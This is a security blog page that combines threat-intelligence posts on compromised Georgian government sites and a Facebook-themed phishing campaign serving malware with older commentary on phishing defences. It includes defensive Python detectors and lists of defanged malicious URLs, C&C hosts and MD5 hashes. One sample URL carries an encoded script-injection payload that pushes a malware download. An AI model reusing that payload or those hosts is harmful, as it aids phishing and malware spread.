
Wednesday, September 11, 2019

Historical OSINT - Georgian Justice Department and Georgia Ministry of Defense Compromised Serving Malware Courtesy of the Kneber Botnet

It's 2010 and I've recently come across a compromised Georgian Government Ministry of Defense and Ministry of Justice official Web site potentially participating in a widespread phishing and malware-serving campaign enticing users into interacting with the rogue U.S Intelligence and U.S Law Enforcement themed emails for the purpose of spreading and dropping malicious software on the targeted host's PC.


Sample malicious URL known to have participated in the campaign, abusing a common Web site redirection vulnerability:
hxxp://www.mod.gov.ge/2007/video/movie.php?l=G&v=%20%3E%20a%20href%20http%3A%2F%2Fofficialweightlosshelp.org%2Fwp-admin%2Freport.zip%20%3EDownload%20%3C%2Fa%3E%20script%3Ewindow.OPEN%20http%3A%2F%2Fofficialweightlosshelp.org%2Fwp-admin%2Freport.zip%20%3C%2Fscript%3E%20#05184916461921807121
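
A way to spot this kind of abuse in a site's own request logs, as an added example that is not part of the original post: decode every query parameter and flag values that carry an absolute URL pointing away from the requested site, noting whether markup came with it. The function names, the same-site rule (exact host or subdomain) and the two `example.org` requests are assumptions constructed for illustration; the first sample is the defanged URL quoted above.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Absolute http(s) URL inside a parameter value; group 1 is the authority part.
EMBEDDED_URL = re.compile(r"https?://([^\s/<>\"'?#]+)", re.IGNORECASE)
# HTML tags, or tag leftovers such as "script>" and "href" when a filter ate "<".
MARKUP = re.compile(r"<\s*/?\s*[a-z]+[^>]*>|script\s*>|\bhref\b|\bsrc\b",
                    re.IGNORECASE)


def _host(authority):
    """Lower-case host taken from a 'user@host:port' authority string."""
    return authority.rsplit("@", 1)[-1].split(":", 1)[0].lower().rstrip(".")


def _same_site(host, site):
    """Assumed rule: the site itself or any of its subdomains counts as same-site."""
    return host == site or host.endswith("." + site)


def offsite_payloads(request_url):
    """Return [(param, embedded_host, has_markup)] for query values that
    carry an absolute URL pointing away from the requested site."""
    # Accept defanged input (hxxp) so published indicators can be fed in as-is.
    url = re.sub(r"^hxxp", "http", request_url.strip(), flags=re.IGNORECASE)
    parts = urlsplit(url)
    site = (parts.hostname or "").lower()
    if site.startswith("www."):
        site = site[4:]
    findings = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        value = unquote(value)  # parse_qsl decoded once; this catches double encoding
        has_markup = bool(MARKUP.search(value))
        hosts = {_host(m.group(1)) for m in EMBEDDED_URL.finditer(value)}
        for host in sorted(h for h in hosts if h and not _same_site(h, site)):
            findings.append((name, host, has_markup))
    return findings


SAMPLES = [
    # From the post (defanged), query string as published.
    "hxxp://www.mod.gov.ge/2007/video/movie.php?l=G&v=%20%3E%20a%20href%20"
    "http%3A%2F%2Fofficialweightlosshelp.org%2Fwp-admin%2Freport.zip%20%3E"
    "Download%20%3C%2Fa%3E%20script%3Ewindow.OPEN%20http%3A%2F%2F"
    "officialweightlosshelp.org%2Fwp-admin%2Freport.zip%20%3C%2Fscript%3E%20"
    "#05184916461921807121",
    # Constructed: same-site return URL, must not be flagged.
    "http://www.example.org/login?next=http%3A%2F%2Fwww.example.org%2Fhome",
    # Constructed: double-encoded off-site link without markup.
    "http://www.example.org/out.php?u=http%253A%252F%252Fcdn.example.net%252Ffile.zip",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(urlsplit(sample).hostname, offsite_payloads(sample))
```

A parameter that is flagged with markup present is a candidate for output encoding or an allow-list of redirect targets on the server side.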

Related malicious URLs known to have participated in the campaign:
hxxp://officialweightlosshelp.org/wp-admin/report.zip

Spread URL found within the config:
hxxp://www.adventure-center.net/upload/x.txt - 195.70.48.67

Related compromised malicious URLs known to have participated in the campaign:
hxxp://new.justice.gov.ge/files/Headers/in.txt
hxxp://new.justice.gov.ge/files/Headers/fresh.txt
hxxp://new.justice.gov.ge/files/Headers/rollers1.php

Related MD5s known to have participated in the campaign:

Known to have participated in the campaign are also the following two domains part of the Hilary Kneber botnet:
hxxp://dnicenter.com - Email: abuseemaildhcp@gmail.com
hxxp://dhsorg.org - Email: hilarykneber@yahoo.com

Related malicious download location URLs known to have participated in the campaign:

Related malicious and fraudulent domains known to have participated in the campaign:
hxxp://dhsinfo.info - 218.240.28.34
hxxp://greylogic.info - 218.240.28.34; 218.240.28.4
hxxp://intelfusion.info - 218.240.28.34

hxxp://greylogic.org - 222.122.60.1

Related malicious MD5s known to have participated in the campaign:
MD5: 8b3a3c4386e4d59c6665762f53e6ec8e
MD5: 5fb94eef8bd57fe8e20ccc56e33570c5
MD5: 28c4648f05f46a3ec37d664cee0d84a8

Once executed, a sample malware phones back to the following C&C server IPs:
hxxp://from-us-with-love.info - 91.216.141.171
hxxp://from-us-with-love.info/imglov/zmpt4d/n16v18.bin
hxxp://vittles.mobi - 174.132.255.10

hxxp://nicupdate.com - 85.31.97.194

Related malicious and fraudulent IPs known to have participated in the Hilary Kneber botnet campaign:

Related malicious and fraudulent domains known to have participated in the Hilary Kneber botnet campaign:

Related Hilary Kneber botnet posts:
Keeping Money Mule Recruiters on a Short Leash
Standardizing the Money Mule Recruitment Process
Dissecting the Exploits/Scareware Serving Twitter Spam Campaign
Koobface Botnet Starts Serving Client-Side Exploits

Friday, December 23, 2016

Historical OSINT - Zeus and Client-Side Exploit Serving Facebook Phishing Campaign Spotted in the Wild

In a cybercrime ecosystem dominated by fraudulent propositions, cybercriminals continue actively populating their botnet's infected population with hundreds of thousands of newly affected users globally, potentially compromising the confidentiality, integrity and availability of the affected hosts to a multitude of malicious software, further earning fraudulent revenue in the process of monetizing the affected botnet's population, largely relying on the utilization of affiliate-based type of fraudulent revenue monetization scheme.

We've recently intercepted a currently circulating malicious spam campaign impersonating Facebook for the purpose of serving client-side exploits to socially engineered users, further compromising the confidentiality, integrity and availability of the affected hosts to a multitude of malicious software, further earning fraudulent revenue in the process of monetizing the affected hosts, largely relying on the use of affiliate-based type of fraudulent revenue monetizing scheme.

In this post we'll profile the campaign, provide actionable intelligence on the infrastructure behind it, and discuss in-depth the tactics, techniques and procedures of the cybercriminals behind it.

Sample URL exploitation chain:
hxxp://auth.facebook.com.megavids.org/id735rp/LoginFacebook.php
    - hxxp://wqdfr.salefale.com/index.php - 62.193.127.197
        - hxxp://spain.salefale.com/index.php

Related malicious domains known to have participated in the campaign:
hxxp://salefale.com - 112.137.165.114
    - hxxp://countrtds.ru - 91.201.196.102 - Email: thru@freenetbox.ru
       
Sample detection rate for the malicious executable:
MD5: e96c8d23e3b64d79e5e134a9633d6077
MD5: 19d9cc4d9d512e60f61746ef4c741f09

Once executed, a sample malware phones back to:
hxxp://makotoro.com

Related malicious C&C server IPs known to have participated in the campaign:

Related malicious C&C server IPs (212.175.173.88) known to have participated in the campaign:

We'll continue monitoring the campaign and post updates as soon as new developments take place.

Friday, April 14, 2006

Fighting Internet's email junk through licensing

Just came across this story at Slashdot, interesting approach :



"China has introduced regulations that make it illegal to run an email server without a licence. The new rules, which came into force two weeks ago, mean that most companies running their own email servers in China are now breaking the law. The new email licensing clause is just a small part of a new anti-spam law formulated by China's Ministry of Information Industry (MII)."



While the commitment is a remarkable event given China's booming Internet population -- among the main reasons Google had to somehow enter China's search market and take market share from Baidu.com -- you don't need a mail server to disseminate spam and phishing attacks like it used to be in the old days. You need botnets, namely, going through CME's List, you would see how the majority of today's malware is loaded with a built-in SMTP engine, even offline/in-transit/web email harvesting modules.



You can often find China on the top of every recently released spam/phishing/botnet trends summary, which doesn't mean Chinese Internet users are insecure -- just unaware. What you can do is educate the masses to secure the entire population, and stimulate the growth of the local security market that everyone is so desperately trying to tap into.


Moreover, I doubt you can regulate the type of Internet users still trying to freely access information, again with the wrong attitude in respect to security :



"..prohibiting use of email to discuss certain vaguely defined subjects related to 'network security' and 'information security', and also reiterate that emails which contain content contrary to existing laws must not be copied or forwarded. Wide-ranging laws of this nature have been used against political and religious dissenters in the past."



It's like legally justifying the country's censorship practices through introducing the law, whereas I feel "network security" and "information security" attacks outside the homeland get favored, compared to internal ones, don't you?



Forbidden fruits turn into dangerous desires on the majority of occasions, and you just can't control that, what's left to censor it.




Wednesday, April 05, 2006

Heading in the opposite direction

Just one day before April 1st 2006 I came across this article :



"German retail banker Postbank will begin using electronic signatures on e-mails to its customers to help protect them from phishing attacks."



Catching up with the phishers seems to be a very worrisome future strategy. Electronic Signatures by themselves are rarely checked by anyone, and many more attack vectors are making the idea of this totally irrelevant. Moreover, a great research "Why phishing works" was recently released and it basically outlines basic facts such as how end users don't pay attention to security checks, if there's a definition of such given the attack vectors phishers have started using recently. In some of my previous posts "Security threats to consider when doing E-Banking", and "Anti Phishing toolbars - can you trust them?" I mentioned many other problems related to this bigger than it seems problem, what you should also keep an eye on is the good old ATM scam I hope you are aware of.



Postbank is often targeted by phishers, still, the best protection is the level of security awareness stated in here :



"Phishing attacks have led 80% of Germans to distrust banking related e-mails, according to TNS Infratest." Moreover, "Postbank's electronic signature service isn't possible with web-based e-mail services provided by local Internet service providers such as GMX GmbH and Freenet.de AG, according to Ebert. One exception is Web.de"



Thankfully, but that's when you are going in exactly the opposite direction than your customers are, while trying to establish a reputable bank2customer relationship over email. Listen to your customers first, and follow the trends, and do not try to use the most popular dissemination vector as a future communication one.



Something else in respect to recent phishing statistics is the key summary points of the recently released AntiPhishingGroup's report for January, 2006 :



• Number of unique phishing reports received in January: 17,877
• Number of unique phishing sites received in January: 9715
• Number of brands hijacked by phishing campaigns in January: 101
• Number of brands comprising the top 80% of phishing campaigns in January: 6
• Country hosting the most phishing websites in January: United States
• Contain some form of target name in URL: 45 %
• No hostname just IP address: 30 %
• Percentage of sites not using port 80: 8 %
• Average time online for site: 5.0 days
• Longest time online for site: 31 days




I feel there's a lot more to expect than trying to re-establish the communication over a broken channel, as far as E-banking is concerned.



More resources you might be interested in taking a look at are :
Vulnerability of First-Generation Digital Certificates and Potential for Phishing Attacks
Netcraft: More than 450 Phishing Attacks Used SSL in 2005
SSL's Credibility as Phishing Defense Is Tested
Rootkit Pharming
The future of Phishing
Something is Phishy here...
Phishing Site Using Valid SSL Certificates
Thoughts on Using SSL/TLS Certificates as the Solution to Phishing




Monday, March 06, 2006

Anti Phishing toolbars - can you trust them?

A lot of recent phishing events occurred, and what should be mentioned is their constant ambitions towards increasing the number of trust points between end users and the mirror version of the original site. The use of SSL and the ease of obtaining a valid certificate for a to-be fraudulent domain is a fairly simple practice. Phishing is so much more than this, and it even has to do with buying 0day vulnerabilities to keep itself competitive.


How should phishing be fought? Educating the end user not to trust that he/she's on Amazon.com, when he just typed it, or enforcing a technological solution to the problem of digital social engineering and trust building? As far as trends are concerned, according to the AntiPhishingGroup's latest report :



• Number of unique phishing reports received in December: 15244
• Number of unique phishing sites received in December: 7197
• Number of brands hijacked by phishing campaigns in December: 121
• Number of brands comprising the top 80% of phishing campaigns in December: 7
• Country hosting the most phishing websites in December: United States
• Contain some form of target name in URL: 51 %
• No hostname just IP address: 32 %
• Percentage of sites not using port 80: 7 %
• Average time online for site: 5.3 days
• Longest time online for site: 31 days
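
The three URL traits counted in the January and December reports (target name in the URL, IP-only host, port other than 80) can be computed mechanically, as can the brand-as-subdomain hostname used in the Facebook campaign profiled earlier on this page. The following is an added example, not code from the reports or the original posts; the brand watch list, the last-two-labels shortcut for the registrable domain and every URL except the defanged Facebook one are assumptions constructed for illustration.

```python
import ipaddress
from urllib.parse import urlsplit

# Assumption: protected brand names mapped to the domains they really own.
BRANDS = {"facebook": {"facebook.com"}, "paypal": {"paypal.com"}}


def _ip_host(host):
    """True for dotted IPv4, IPv6, or a bare-decimal IP such as 3221225994."""
    try:
        ipaddress.ip_address(int(host) if host.isdigit() else host)
        return True
    except ValueError:
        return False


def url_features(url):
    """Compute the three lexical traits for one (possibly defanged) URL."""
    parts = urlsplit(url.strip().replace("hxxp", "http", 1))
    host = (parts.hostname or "").lower().rstrip(".")
    try:
        port = parts.port
    except ValueError:          # malformed port: fall back to the scheme default
        port = None
    if port is None:
        port = 443 if parts.scheme == "https" else 80
    ip_only = _ip_host(host)
    # Naive registrable domain (last two labels). A production check would
    # consult the Public Suffix List instead.
    registrable = host if ip_only else ".".join(host.split(".")[-2:])
    haystack = host + parts.path.lower()
    # A brand name counts only when the site is not one the brand owns, so
    # auth.facebook.com.megavids.org is flagged and www.facebook.com is not.
    target = any(brand in haystack and registrable not in owned
                 for brand, owned in BRANDS.items())
    return {"target_name_in_url": target,
            "ip_only_host": ip_only,
            "non_port_80": port != 80}


def summarize(urls):
    """Percentage of URLs showing each trait, in the style of the report."""
    rows = [url_features(u) for u in urls]
    if not rows:
        return {}
    return {key: round(100 * sum(r[key] for r in rows) / len(rows))
            for key in rows[0]}


SAMPLE_URLS = [
    # From the Facebook campaign on this page (defanged).
    "hxxp://auth.facebook.com.megavids.org/id735rp/LoginFacebook.php",
    # Constructed samples using documentation address ranges.
    "http://192.0.2.10/paypal/login.htm",
    "http://198.51.100.7:8080/update/",
    "http://3221225994/secure/",          # 192.0.2.10 written as one decimal
    "http://www.facebook.com/login.php",  # the brand's own site
]

if __name__ == "__main__":
    for u in SAMPLE_URLS:
        print(u, url_features(u))
    print(summarize(SAMPLE_URLS))
```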



In case you haven't come across this research "Do Security Toolbars Actually Prevent Phishing Attacks?" you'll find that it has very good points and actual evidence. Antiphishing filters and toolbars protection are gaining popularity, and many popular companies are fighting for market share of the end users' desktop, but keep in mind that :



"We conducted two user studies of three security toolbars and other browser security indicators and found them all ineffective at preventing phishing attacks. Even though subjects were asked to pay attention to the toolbar, many failed to look at it; others disregarded or explained away the toolbars’ warnings if the content of web pages looked legitimate. We found that many subjects do not understand phishing attacks or realize how sophisticated such attacks can be."



The topic of phishing and fighting the problem has been again greatly extended by the researcher Min Xu, while writing the thesis "Fighting Phishing at the User Interface" and introducing a solution that measures a site's reputation and trustfulness. While this is among the simplest ways Google uses while assigning PageRank, I find this a common sense warning. Still, with the constant flood of Web 2.0 companies, does it matter? :) Check out some screenshots from this outstanding thesis, and get the point :


Localizing the attacks, taking advantage of the momentum, or a software vulnerability within a popular browser or site itself, as well as taking advantage of malware, are among the most common practices these days. Moreover, I feel that fighting phishing the wrong way could erode the end user's trust in the Web on the other hand, so do your homework on the social impact on anything you do. NetCraft's Anti Phishing toolbar, whatsoever, is my favorite combination of them all, still, awareness and lack of naivety when it comes to transactions or authentication is the perfect tool, what about yours?



Some resources worth mentioning are :

Candid's “Phishing in the middle of the stream” Today’s threats to online banking
Know your Enemy : Phishing
Phishing attacks and countermeasures
The Phishing Guide
Distributed Phishing Attacks
Phishiest Countries
MailFrontier Phishing IQ Test
Online Identity Theft: Phishing Technology, Chokepoints and Countermeasures


